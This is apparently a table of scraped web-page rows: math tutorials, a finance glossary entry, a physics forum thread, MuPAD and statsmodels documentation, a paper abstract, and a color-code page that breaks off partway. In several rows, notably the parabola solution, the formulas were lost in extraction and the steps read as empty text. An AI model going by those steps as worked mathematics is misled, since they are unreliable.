URL
stringlengths
15
1.68k
text_list
listlengths
1
199
image_list
listlengths
1
199
metadata
stringlengths
1.19k
3.08k
https://istopdeath.com/graph-fxx-3x1/
[ "# Graph f(x)=(x-3)(x+1)", null, "Find the properties of the given parabola.\nRewrite the equation in vertex form.\nComplete the square for .\nExpand using the FOIL Method.\nApply the distributive property.\nApply the distributive property.\nApply the distributive property.\nSimplify and combine like terms.\nSimplify each term.\nMultiply by .\nMultiply by .\nMultiply by .\nSubtract from .\nUse the form , to find the values of , , and .\nConsider the vertex form of a parabola.\nSubstitute the values of and into the formula .\nSimplify the right side.\nCancel the common factor of .\nCancel the common factor.\nDivide by .\nMultiply by .\nFind the value of using the formula .\nSimplify each term.\nRaise to the power of .\nMultiply by .\nDivide by .\nMultiply by .\nSubtract from .\nSubstitute the values of , , and into the vertex form .\nSet equal to the new right side.\nUse the vertex form, , to determine the values of , , and .\nSince the value of is positive, the parabola opens up.\nOpens Up\nFind the vertex .\nFind , the distance from the vertex to the focus.\nFind the distance from the vertex to a focus of the parabola by using the following formula.\nSubstitute the value of into the formula.\nCancel the common factor of .\nCancel the common factor.\nRewrite the expression.\nFind the focus.\nThe focus of a parabola can be found by adding to the y-coordinate if the parabola opens up or down.\nSubstitute the known values of , , and into the formula and simplify.\nFind the axis of symmetry by finding the line that passes through the vertex and the focus.\nFind the directrix.\nThe directrix of a parabola is the horizontal line found by subtracting from the y-coordinate of the vertex if the parabola opens up or down.\nSubstitute the known values of and into the formula and simplify.\nUse the properties of the parabola to analyze and graph the parabola.\nDirection: Opens Up\nVertex:\nFocus:\nAxis of Symmetry:\nDirectrix:\nDirection: Opens Up\nVertex:\nFocus:\nAxis of Symmetry:\nDirectrix:\nSelect a few values, and plug them into the equation to find the corresponding values. The values should be selected around the vertex.\nReplace the variable with in the expression.\nSimplify the result.\nSubtract from .\nMultiply by .\nThe final answer is .\nThe value at is .\nReplace the variable with in the expression.\nSimplify the result.\nSubtract from .\nMultiply by .\nThe final answer is .\nThe value at is .\nReplace the variable with in the expression.\nSimplify the result.\nSubtract from .\nMultiply by .\nThe final answer is .\nThe value at is .\nReplace the variable with in the expression.\nSimplify the result.\nSubtract from .\nMultiply by .\nThe final answer is .\nThe value at is .\nGraph the parabola using its properties and the selected points.\nGraph the parabola using its properties and the selected points.\nDirection: Opens Up\nVertex:\nFocus:\nAxis of Symmetry:\nDirectrix:\nGraph f(x)=(x-3)(x+1)", null, "", null, "", null, "## Download our App from the store\n\n### Create a High Performed UI/UX Design from a Silicon Valley.", null, "", null, "Scroll to top" ]
[ null, "https://istopdeath.com/wp-content/uploads/ask60.png", null, "https://www.istopdeath.com/polygon_03-1.png", null, "https://www.istopdeath.com/ellipse_02-1-1.png", null, "https://www.istopdeath.com/ellipse_01-1-1.png", null, "https://www.istopdeath.com/path-60-1.png", null, "https://www.istopdeath.com/1510-1.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.84518635,"math_prob":0.9818685,"size":2862,"snap":"2022-40-2023-06","text_gpt3_token_len":654,"char_repetition_ratio":0.1623513,"word_repetition_ratio":0.4139265,"special_character_ratio":0.22396925,"punctuation_ratio":0.18461539,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9998129,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-09-24T16:47:57Z\",\"WARC-Record-ID\":\"<urn:uuid:20e98496-7e24-47bf-8d11-6e3f93a66d79>\",\"Content-Length\":\"139110\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:244bdbb7-23c8-4064-9657-b9535cd94fd2>\",\"WARC-Concurrent-To\":\"<urn:uuid:3d220b23-d7c4-414d-b70a-be08815be38a>\",\"WARC-IP-Address\":\"107.167.10.249\",\"WARC-Target-URI\":\"https://istopdeath.com/graph-fxx-3x1/\",\"WARC-Payload-Digest\":\"sha1:L5RNNZFIG3ZWZDLO777XNHVPKD7AB7HD\",\"WARC-Block-Digest\":\"sha1:RY7XML262P7FYSL6O2IIKF7TEMORQVMO\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030331677.90_warc_CC-MAIN-20220924151538-20220924181538-00204.warc.gz\"}"}
https://www.finanshels.com/glossary/difference-between-margin-and-markup
[ "< Back to Glossary\n\n# Difference between margin and markup\n\nMargin and markup are two terms that are often used interchangeably, but they refer to slightly different concepts. Margin is the difference between the selling price of a good or service and the cost of producing it. It is calculated by dividing the difference by the selling price and expressing the result as a percentage. For example, if a company sells a product for \\$100 and it costs \\$75 to produce, the margin would be 25% (\\$25 / \\$100). Markup, on the other hand, is the amount added to the cost of a product to determine the selling price. It is calculated by dividing the difference between the selling price and the cost by the cost and expressing the result as a percentage. Using the same example as above, if a company sells a product for \\$100 and it costs \\$75 to produce, the markup would be 33.33% (\\$25 / \\$75). In summary, margin and markup are similar in that they both express the difference between the selling price and the cost of a product as a percentage. However, margin is calculated based on the selling price, while markup is calculated based on the cost.", null, "", null, "", null, "", null, "", null, "" ]
[ null, "https://assets-global.website-files.com/634fc8d084a32a7597b0bde8/6437b834549a69989a70fc83_Stop%20Playing%20with%20Your%20Finances-%20Download%20Our%20Ebook%20Now.webp", null, "https://assets-global.website-files.com/634fc8d084a32a7597b0bde8/642d6e3011520d7bfbeac608_stars-4.5.svg", null, "https://assets-global.website-files.com/634fc8d184a32a4d61b0be23/6423ce3708bd3fd1e22264b3_bader%20image.webp", null, "https://assets-global.website-files.com/634fc8d084a32a7597b0bde8/642d75b09571235307d6752a_online%20bookkeeping.webp", null, "https://assets-global.website-files.com/634fc8d184a32a4d61b0be23/642c036bcc98cf6aea5fe988_11.webp", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9727154,"math_prob":0.948354,"size":1081,"snap":"2023-40-2023-50","text_gpt3_token_len":229,"char_repetition_ratio":0.15413184,"word_repetition_ratio":0.2617801,"special_character_ratio":0.2358927,"punctuation_ratio":0.093457945,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9907096,"pos_list":[0,1,2,3,4,5,6,7,8,9,10],"im_url_duplicate_count":[null,9,null,9,null,9,null,9,null,9,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-08T03:57:50Z\",\"WARC-Record-ID\":\"<urn:uuid:5cc85308-d566-44f6-9374-ef6227970eff>\",\"Content-Length\":\"31895\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:faef45d1-7173-44e8-878d-e914dba47988>\",\"WARC-Concurrent-To\":\"<urn:uuid:5ac23662-c4d5-418b-a79c-cdd3a28756b8>\",\"WARC-IP-Address\":\"34.234.52.18\",\"WARC-Target-URI\":\"https://www.finanshels.com/glossary/difference-between-margin-and-markup\",\"WARC-Payload-Digest\":\"sha1:PLLMUMDNWWS3TOXMGNWIGT54I2UQQ5DY\",\"WARC-Block-Digest\":\"sha1:BRLQSEOBABKNHSXSFQQRG3TST6XS2ZZH\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100710.22_warc_CC-MAIN-20231208013411-20231208043411-00507.warc.gz\"}"}
https://www.physicsforums.com/threads/motion-in-curves-find-radial-and-circumferential-components-of-v-and-a.468350/
[ "# Motion in curves - Find radial and circumferential components of V and A\n\n## Homework Statement\n\nAt time t, a comet has the position R = (t2-1)i + 2tj\n\nAt t = 2, find the radial and circumferential components of velocity and acceleration\n\n## Homework Equations\n\nVr = V * Ur\nVθ = V * Uθ\n\nar = a * Ur\naθ = a * Uθ\n\nUr = cosθ i + sinθ j\nUθ = -sinθ i + cosθ j\n\n## The Attempt at a Solution\n\nI've found\n\nv = 2ti + 2j\na= 2i\n\nHowever, am I allowed to use these equations when the position vector is a function of t and not a function of θ? I'm not very good at polar coordinates so I'm really not sure if I can apply the above equations to my problem right away. Thanks\n\n## Answers and Replies\n\nlanedance\nHomework Helper\nso you've found the correct equations for v & a in caretseian coords, however now you must find their projection in the radial and theta directions\n\nYeah, but say I do Vr = V * Ur\n\nI would get\n\nVr = (2t i + 2 j) * (cosθ i + sinθ j)\nVr = 2tcosθ i + 2sinθ j\n\nIs that right? It strikes me as odd that the Vr I found has both θ and t in it.\n\nlanedance\nHomework Helper\nYeah, but say I do Vr = V * Ur\n\nI would get\n\nVr = (2t i + 2 j) * (cosθ i + sinθ j)\nVr = 2tcosθ i + 2sinθ j\n\nIs that right? It strikes me as odd that the Vr I found has both θ and t in it.\n\nif that is a dot product, then it should have a scalar result, not a vector\nVr = (2t i + 2 j) * (cosθ i + sinθ j) = 2tcosθ + 2sinθ\n\nAnd it should be a simple exercise to write theta in terms of t\n\nLast edited:\nSammyS\nStaff Emeritus\nScience Advisor\nHomework Helper\nGold Member\nYeah, but say I do Vr = V * Ur\n\nI would get\n\nVr = (2t i + 2 j) * (cosθ i + sinθ j)\nVr = 2tcosθ i + 2sinθ j\n\nIs that right? It strikes me as odd that the Vr I found has both θ and t in it.\nWhat sort of multiplication gives: (2t i + 2 j) * (cosθ i + sinθ j) = 2t*cosθ i + 2sinθ j ?" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.88292617,"math_prob":0.9807785,"size":584,"snap":"2021-21-2021-25","text_gpt3_token_len":193,"char_repetition_ratio":0.094827585,"word_repetition_ratio":0.0,"special_character_ratio":0.30650684,"punctuation_ratio":0.041666668,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9979938,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-06-25T05:08:50Z\",\"WARC-Record-ID\":\"<urn:uuid:b1bb86da-56d7-4f24-a9e9-999dd4344012>\",\"Content-Length\":\"71556\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7f5f9435-1c8a-4d31-a615-2115f64d3256>\",\"WARC-Concurrent-To\":\"<urn:uuid:00b24bbf-85a9-4043-9f95-499a06ce75bc>\",\"WARC-IP-Address\":\"172.67.68.135\",\"WARC-Target-URI\":\"https://www.physicsforums.com/threads/motion-in-curves-find-radial-and-circumferential-components-of-v-and-a.468350/\",\"WARC-Payload-Digest\":\"sha1:L3LN63YIPCCXYGYD3CAZ3WHUKC3LPKWV\",\"WARC-Block-Digest\":\"sha1:5GGW7JXWP4F7SPMCIGYQRV6EDPNRDBE6\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-25/CC-MAIN-2021-25_segments_1623488567696.99_warc_CC-MAIN-20210625023840-20210625053840-00262.warc.gz\"}"}
https://kr.mathworks.com/help/symbolic/mupad_ref/not.html
[ "# `not`, `_not`\n\nLogical negation\n\nMuPAD® notebooks will be removed in a future release. Use MATLAB® live scripts instead.\n\nMATLAB live scripts support most MuPAD functionality, though there are some differences. For more information, see Convert MuPAD Notebooks to MATLAB Live Scripts.\n\n## Syntax\n\n```not b\n_not(`b`)\n```\n\n## Description\n\n`not b` represents the logical negation of the Boolean expression `b`.\n\nMuPAD® uses a three state logic with the Boolean constants `TRUE`, `FALSE`, and `UNKNOWN`. These are processed as follows:\n\n• `not TRUE = FALSE`\n\n• `not FALSE = TRUE`\n\n• `not UNKNOWN = UNKNOWN`\n\n`_not(b)` is equivalent to `not b`.\n\nBoolean expressions can be composed of these constants as well as of arbitrary arithmetical expressions. Typically, equations, such as `x = y`, and inequalities, such as ```x <> y```, `x < y`, and ```x <= y```, are used to construct Boolean expressions.\n\nCombinations of the constants `TRUE`, `FALSE`, `UNKNOWN` inside a Boolean expression are simplified automatically. However, symbolic Boolean subexpressions, equalities, and inequalities are not evaluated and simplified by logical operators. Use `bool` to evaluate such expressions to one of the Boolean constants. Note, however, that `bool` can evaluate inequalities ```x < y```, `x <= y` and so on only if they are composed of numbers of type `Type::Real`. See Example 2.\n\nUse `simplify` with the option `logic` to simplify expressions involving symbolic Boolean subexpressions. See Example 3.\n\nThe precedences of the logical operators are as follows. If in doubt, use brackets to make sure that the expression is parsed as desired.\n\n• The operator `not` is stronger binding than `and`, that is, `not b1 and b2` = ```(not b1) and b2```.\n\n• The operator `and` is stronger binding than `xor`, that is, `b1 and b2 or b3` = ```(b1 and b2) xor b3```.\n\n• The operator `xor` is stronger binding than `or`, that is, `b1 xor b2 or b3` = ```(b1 xor b2) or b3```.\n\n• The operator `or` is stronger binding than `==>`, that is, ```b1 or b2 ==> b3``` = `(b1 or b2) ==> b3`.\n\n• The operator `==>` is stronger binding than `<=>`, that is, ```b1 ==> b2 <=> b3``` = `(b1 ==> b2) <=> b3`.\n\nIn the conditional context of `if`, `repeat`, and `while` statements, Boolean expressions are evaluated via “lazy evaluation” (see `_lazy_and`, `_lazy_or`). In any other context, all operands are evaluated.\n\n## Examples\n\n### Example 1\n\nCombinations of the Boolean constants `TRUE`, `FALSE`, and `UNKNOWN` are simplified automatically to one of these constants:\n\n`TRUE and not (FALSE or TRUE)`\n`", null, "`\n`not UNKNOWN`\n`", null, "`\n\n### Example 2\n\nLogical operators simplify subexpressions that evaluate to the constants `TRUE`, `FALSE`, `UNKNOWN`.\n\n`b1 or b2 and (not FALSE)`\n`", null, "`\n`FALSE or ((not b1) and TRUE)`\n`", null, "`\n`b1 and (b2 or FALSE) and (not UNKNOWN)`\n`", null, "`\n\nHowever, equalities and inequalities are not evaluated:\n\n`not(x = x) and (1 < 2) and (2 < 3) and (3 > 4)`\n`", null, "`\n\nBoolean evaluation is enforced via `bool`:\n\n`bool(%)`\n`", null, "`\n\n### Example 3\n\nExpressions involving symbolic Boolean subexpressions are not simplified by `and`, `or`, `not`. Simplification has to be requested explicitly via the function `simplify`:\n\n`(b1 and b2) or (b1 and (not b2)) and (1 < 2)`\n`", null, "`\n`simplify(%, logic)`\n`", null, "`\n\n## Parameters\n\n `b` Boolean expressions\n\n## Return Values\n\nBoolean expression.\n\n`b`, `b_1`, `b_2`" ]
[ null, "https://kr.mathworks.com/help/symbolic/mupad_ref/not-d0e772.png", null, "https://kr.mathworks.com/help/symbolic/mupad_ref/not-d0e784.png", null, "https://kr.mathworks.com/help/symbolic/mupad_ref/not-d0e801.png", null, "https://kr.mathworks.com/help/symbolic/mupad_ref/not-d0e805.png", null, "https://kr.mathworks.com/help/symbolic/mupad_ref/not-d0e809.png", null, "https://kr.mathworks.com/help/symbolic/mupad_ref/not-1ab3abed.png", null, "https://kr.mathworks.com/help/symbolic/mupad_ref/not-3d77f22e.png", null, "https://kr.mathworks.com/help/symbolic/mupad_ref/not-d0e865.png", null, "https://kr.mathworks.com/help/symbolic/mupad_ref/not-d0e869.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8152388,"math_prob":0.9845711,"size":2988,"snap":"2020-10-2020-16","text_gpt3_token_len":813,"char_repetition_ratio":0.14477211,"word_repetition_ratio":0.033333335,"special_character_ratio":0.26338688,"punctuation_ratio":0.14438502,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9956561,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18],"im_url_duplicate_count":[null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-02-21T22:57:49Z\",\"WARC-Record-ID\":\"<urn:uuid:550f034d-74d1-4d8a-bb9e-94366aa22e30>\",\"Content-Length\":\"75467\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c2075101-b113-4903-a1e0-748aa64053bd>\",\"WARC-Concurrent-To\":\"<urn:uuid:de2fddb0-fc72-4aec-9617-d6dc7d56fe18>\",\"WARC-IP-Address\":\"104.110.193.39\",\"WARC-Target-URI\":\"https://kr.mathworks.com/help/symbolic/mupad_ref/not.html\",\"WARC-Payload-Digest\":\"sha1:KOIXFAHYSQQR7EFB6AIFW2T7SEJDYCK7\",\"WARC-Block-Digest\":\"sha1:ZIX2SCTKBCKEG6UHFGRGR5AYKPAUZ2KR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-10/CC-MAIN-2020-10_segments_1581875145538.32_warc_CC-MAIN-20200221203000-20200221233000-00558.warc.gz\"}"}
https://brilliant.org/practice/quadratic-equations-level-1-challenges/?subtopic=quadratic-equations&chapter=quadratic-equations
[ "", null, "Algebra\n\n# Quadratic Equations: Level 2 Challenges", null, "The image above illustrates which identity?\n\nWhen the square of a certain positive integer is reduced by 38, we get the value 83. What is the integer?\n\nSuppose that 6 is one of the roots of quadratic equation $x^2-2x+a=0$. What is the other root?\n\n\\begin{aligned} x(y+z)&=&39\\\\ y(x+z)&=&60\\\\ z(x+y)&=&63 \\\\ x^2+y^2+z^2&=& \\ ? \\end{aligned}\n\nSee Part 2 and Part 3.", null, "What are the solutions to the equation\n\n$x^2 = 4 ?$\n\n×" ]
[ null, "https://ds055uzetaobb.cloudfront.net/brioche/chapter/Quadratic%20Equations-Xy0bUj.png", null, "https://ds055uzetaobb.cloudfront.net/brioche/solvable/7ecb5d07f2.8d73250965.LtHry6.png", null, "https://ds055uzetaobb.cloudfront.net/brioche/solvable/cb654ac8f3.d873c5fa8a.PfNfph.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9288654,"math_prob":0.9999474,"size":611,"snap":"2020-45-2020-50","text_gpt3_token_len":140,"char_repetition_ratio":0.17133443,"word_repetition_ratio":0.29357797,"special_character_ratio":0.23240589,"punctuation_ratio":0.18248175,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999583,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,null,null,8,null,8,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-22T23:31:44Z\",\"WARC-Record-ID\":\"<urn:uuid:d0938322-c85f-481b-9f52-6320dc540979>\",\"Content-Length\":\"90783\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:af7923b3-8821-4e79-84e1-54765d8b2fba>\",\"WARC-Concurrent-To\":\"<urn:uuid:bc460a29-13a2-4542-a297-9ac4b6838f7d>\",\"WARC-IP-Address\":\"104.20.34.242\",\"WARC-Target-URI\":\"https://brilliant.org/practice/quadratic-equations-level-1-challenges/?subtopic=quadratic-equations&chapter=quadratic-equations\",\"WARC-Payload-Digest\":\"sha1:XIMPW6UWUE7L2XFWQGLXPC5NPWWQIKGD\",\"WARC-Block-Digest\":\"sha1:I6PBLNOQ77WHM45VNIVEYK5TOPE74GKJ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107880401.35_warc_CC-MAIN-20201022225046-20201023015046-00338.warc.gz\"}"}
https://www.statsmodels.org/stable/generated/statsmodels.regression.mixed_linear_model.MixedLMResults.html
[ "# statsmodels.regression.mixed_linear_model.MixedLMResults¶\n\nclass statsmodels.regression.mixed_linear_model.MixedLMResults(model, params, cov_params)[source]\n\nClass to contain results of fitting a linear mixed effects model.\n\nMixedLMResults inherits from statsmodels.LikelihoodModelResults\n\nParameters\nSee statsmodels.LikelihoodModelResults\n\nstatsmodels.LikelihoodModelResults\nAttributes\nmodelclass instance\n\nPointer to MixedLM model instance that called fit.\n\nnormalized_cov_paramsndarray\n\nSee specific model class docstring\n\nparamsndarray\n\nA packed parameter vector for the profile parameterization. The first k_fe elements are the estimated fixed effects coefficients. The remaining elements are the estimated variance parameters. The variance parameters are all divided by scale and are not the variance parameters shown in the summary.\n\nfe_paramsndarray\n\nThe fitted fixed-effects coefficients\n\ncov_rendarray\n\nThe fitted random-effects covariance matrix\n\nbse_fendarray\n\nThe standard errors of the fitted fixed effects coefficients\n\nbse_rendarray\n\nThe standard errors of the fitted random effects covariance matrix and variance components. The first k_re * (k_re + 1) parameters are the standard errors for the lower triangle of cov_re, the remaining elements are the standard errors for the variance components.\n\nMethods\n\n bootstrap([nrep, method, disp, store]) simple bootstrap to get mean and variance of estimator conf_int([alpha, cols]) Construct confidence interval for the fitted parameters. cov_params([r_matrix, column, scale, cov_p, …]) Compute the variance/covariance matrix. f_test(r_matrix[, cov_p, scale, invcov]) Compute the F-test for a joint linear hypothesis. get_nlfun(fun) This is not Implemented initialize(model, params, **kwargs) Initialize (possibly re-initialize) a Results instance. load(fname) Load a pickled results instance See specific model class docstring predict([exog, transform]) Call self.model.predict with self.params as the first argument. profile_re(re_ix, vtype[, num_low, …]) Profile-likelihood inference for variance parameters. Remove data arrays, all nobs arrays from result and model. save(fname[, remove_data]) Save a pickle of this instance. summary([yname, xname_fe, xname_re, title, …]) Summarize the mixed model regression results. t_test(r_matrix[, scale, use_t]) Compute a t-test for a each linear hypothesis of the form Rb = q t_test_pairwise(term_name[, method, alpha, …]) Perform pairwise t_test with multiple testing corrected p-values. wald_test(r_matrix[, cov_p, scale, invcov, …]) Compute a Wald-test for a joint linear hypothesis. wald_test_terms([skip_single, …]) Compute a sequence of Wald tests for terms over multiple columns.\n\nProperties\n\n aic Akaike information criterion bic Bayesian information criterion bse The standard errors of the parameter estimates. bse_fe Returns the standard errors of the fixed effect regression coefficients. bse_re Returns the standard errors of the variance parameters. bsejac standard deviation of parameter estimates based on covjac bsejhj standard deviation of parameter estimates based on covHJH covjac covariance of parameters based on outer product of jacobian of log-likelihood covjhj covariance of parameters based on HJJH df_modelwc Model WC fittedvalues Returns the fitted values for the model. hessv cached Hessian of log-likelihood llf pvalues The two-tailed p values for the t-stats of the params. random_effects The conditional means of random effects given the data. random_effects_cov Returns the conditional covariance matrix of the random effects for each group given the data. resid Returns the residuals for the model. score_obsv cached Jacobian of log-likelihood tvalues Return the t-statistic for a given parameter estimate. use_t Flag indicating to use the Student’s distribution in inference." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.54055244,"math_prob":0.9371572,"size":3673,"snap":"2019-51-2020-05","text_gpt3_token_len":800,"char_repetition_ratio":0.13845734,"word_repetition_ratio":0.061181433,"special_character_ratio":0.19003539,"punctuation_ratio":0.13471502,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99326766,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-27T10:45:28Z\",\"WARC-Record-ID\":\"<urn:uuid:2facb7e2-e305-4019-807e-386619f589c5>\",\"Content-Length\":\"40885\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:3113b926-778d-4049-8b92-1e119dd8198c>\",\"WARC-Concurrent-To\":\"<urn:uuid:38daa27e-ad00-4e82-89dc-d1a0adf24b30>\",\"WARC-IP-Address\":\"185.199.109.153\",\"WARC-Target-URI\":\"https://www.statsmodels.org/stable/generated/statsmodels.regression.mixed_linear_model.MixedLMResults.html\",\"WARC-Payload-Digest\":\"sha1:H2HKLN66OXVAHKCBVAPJ5YUY6WQHRR7Q\",\"WARC-Block-Digest\":\"sha1:KR36SWFJ75QSDVMNR3GJN2KPLNXZL4CT\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579251696046.73_warc_CC-MAIN-20200127081933-20200127111933-00319.warc.gz\"}"}
http://science.landoffree.com/paper/determinant-and-inverse-of-join-matrices-on-two-sets
[ "# Determinant and inverse of join matrices on two sets\n\nMathematics – Number Theory\n\nScientific paper\n\n[ 0.00 ] – not rated yet Voters 0   Comments 0\n\n## Details Determinant and inverse of join matrices on two sets Determinant and inverse of join matrices on two sets\n\nScientific paper\n\nLet \\$(P,\\preceq)\\$ be a lattice and \\$f\\$ a complex-valued function on \\$P\\$. We define meet and join matrices on two arbitrary subsets \\$X\\$ and \\$Y\\$ of \\$P\\$ by \\$(X,Y)_f=(f(x_i\\wedge y_j))\\$ and \\$[X,Y]_f=(f(x_i\\vee x_j))\\$ respectively. Here we present expressions for the determinant and the inverse of \\$[X,Y]_f\\$. Our main goal is to cover the case when \\$f\\$ is not semimultiplicative since the formulas presented earlier for \\$[X,Y]_f\\$ cannot be applied in this situation. In cases when \\$f\\$ is semimultiplicative we obtain several new and known formulas for the determinant and inverse of \\$(X,Y)_f\\$ and the usual meet and join matrices \\$(S)_f\\$ and \\$[S]_f\\$. We also apply these formulas to LCM, MAX, GCD and MIN matrices, which are special cases of join and meet matrices.\n\nNo associations\n\nLandOfFree\n\n## Say what you really think\n\nSearch LandOfFree.com for scientists and scientific papers. Rate them and share your experience with other people.\n\n## Rating\n\nDeterminant and inverse of join matrices on two sets does not yet have a rating. At this time, there are no reviews or comments for this scientific paper.\n\nIf you have personal experience with Determinant and inverse of join matrices on two sets, we encourage you to share that experience with our LandOfFree.com community. Your opinion is very important and Determinant and inverse of join matrices on two sets will most certainly appreciate the feedback.\n\nProfile ID: LFWR-SCP-O-564634\n\nAll data on this website is collected from public sources. Our data reflects the most accurate information available at the time of publication." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.88147426,"math_prob":0.9346663,"size":1403,"snap":"2021-04-2021-17","text_gpt3_token_len":363,"char_repetition_ratio":0.13223732,"word_repetition_ratio":0.06481481,"special_character_ratio":0.23734854,"punctuation_ratio":0.0858209,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9641148,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-04-19T19:55:02Z\",\"WARC-Record-ID\":\"<urn:uuid:4f9e1feb-037e-46c4-b06f-e07381939577>\",\"Content-Length\":\"38470\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:277e7654-e77e-4687-8a38-561c41a4ca9d>\",\"WARC-Concurrent-To\":\"<urn:uuid:9245c982-60d1-4f4b-9cb4-2ce47c96d82c>\",\"WARC-IP-Address\":\"5.9.30.72\",\"WARC-Target-URI\":\"http://science.landoffree.com/paper/determinant-and-inverse-of-join-matrices-on-two-sets\",\"WARC-Payload-Digest\":\"sha1:GXYAFAMDVZJZEES2SVS3IHUFXLG6AOHH\",\"WARC-Block-Digest\":\"sha1:SRMLI744PPSZ2QALAO6T462XKRRQVMAL\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-17/CC-MAIN-2021-17_segments_1618038916163.70_warc_CC-MAIN-20210419173508-20210419203508-00123.warc.gz\"}"}
https://www.colorhexa.com/3d4249
[ "# #3d4249 Color Information\n\nIn a RGB color space, hex #3d4249 is composed of 23.9% red, 25.9% green and 28.6% blue. Whereas in a CMYK color space, it is composed of 16.4% cyan, 9.6% magenta, 0% yellow and 71.4% black. It has a hue angle of 215 degrees, a saturation of 9% and a lightness of 26.3%. #3d4249 color hex could be obtained by blending #7a8492 with #000000. Closest websafe color is: #333333.\n\n• R 24\n• G 26\n• B 29\nRGB color chart\n• C 16\n• M 10\n• Y 0\n• K 71\nCMYK color chart\n\n#3d4249 color description : Very dark grayish blue.\n\n# #3d4249 Color Conversion\n\nThe hexadecimal color #3d4249 has RGB values of R:61, G:66, B:73 and CMYK values of C:0.16, M:0.1, Y:0, K:0.71. Its decimal value is 4014665.\n\nHex triplet RGB Decimal 3d4249 `#3d4249` 61, 66, 73 `rgb(61,66,73)` 23.9, 25.9, 28.6 `rgb(23.9%,25.9%,28.6%)` 16, 10, 0, 71 215°, 9, 26.3 `hsl(215,9%,26.3%)` 215°, 16.4, 28.6 333333 `#333333`\nCIE-LAB 27.763, -0.352, -4.941 5.075, 5.37, 7.072 0.29, 0.307, 5.37 27.763, 4.954, 265.926 27.763, -2.824, -5.772 23.172, -1.457, -1.874 00111101, 01000010, 01001001\n\n# Color Schemes with #3d4249\n\n• #3d4249\n``#3d4249` `rgb(61,66,73)``\n• #49443d\n``#49443d` `rgb(73,68,61)``\nComplementary Color\n• #3d4849\n``#3d4849` `rgb(61,72,73)``\n• #3d4249\n``#3d4249` `rgb(61,66,73)``\n• #3e3d49\n``#3e3d49` `rgb(62,61,73)``\nAnalogous Color\n• #48493d\n``#48493d` `rgb(72,73,61)``\n• #3d4249\n``#3d4249` `rgb(61,66,73)``\n• #493e3d\n``#493e3d` `rgb(73,62,61)``\nSplit Complementary Color\n• #42493d\n``#42493d` `rgb(66,73,61)``\n• #3d4249\n``#3d4249` `rgb(61,66,73)``\n• #493d42\n``#493d42` `rgb(73,61,66)``\n• #3d4944\n``#3d4944` `rgb(61,73,68)``\n• #3d4249\n``#3d4249` `rgb(61,66,73)``\n• #493d42\n``#493d42` `rgb(73,61,66)``\n• #49443d\n``#49443d` `rgb(73,68,61)``\n• #1a1c1f\n``#1a1c1f` `rgb(26,28,31)``\n• #26292d\n``#26292d` `rgb(38,41,45)``\n• #31353b\n``#31353b` `rgb(49,53,59)``\n• #3d4249\n``#3d4249` `rgb(61,66,73)``\n• #494f57\n``#494f57` `rgb(73,79,87)``\n• #545b65\n``#545b65` `rgb(84,91,101)``\n• #606873\n``#606873` `rgb(96,104,115)``\nMonochromatic Color\n\n# Alternatives to #3d4249\n\nBelow, you can see some colors close to #3d4249. Having a set of related colors can be useful if you need an inspirational alternative to your original color choice.\n\n• 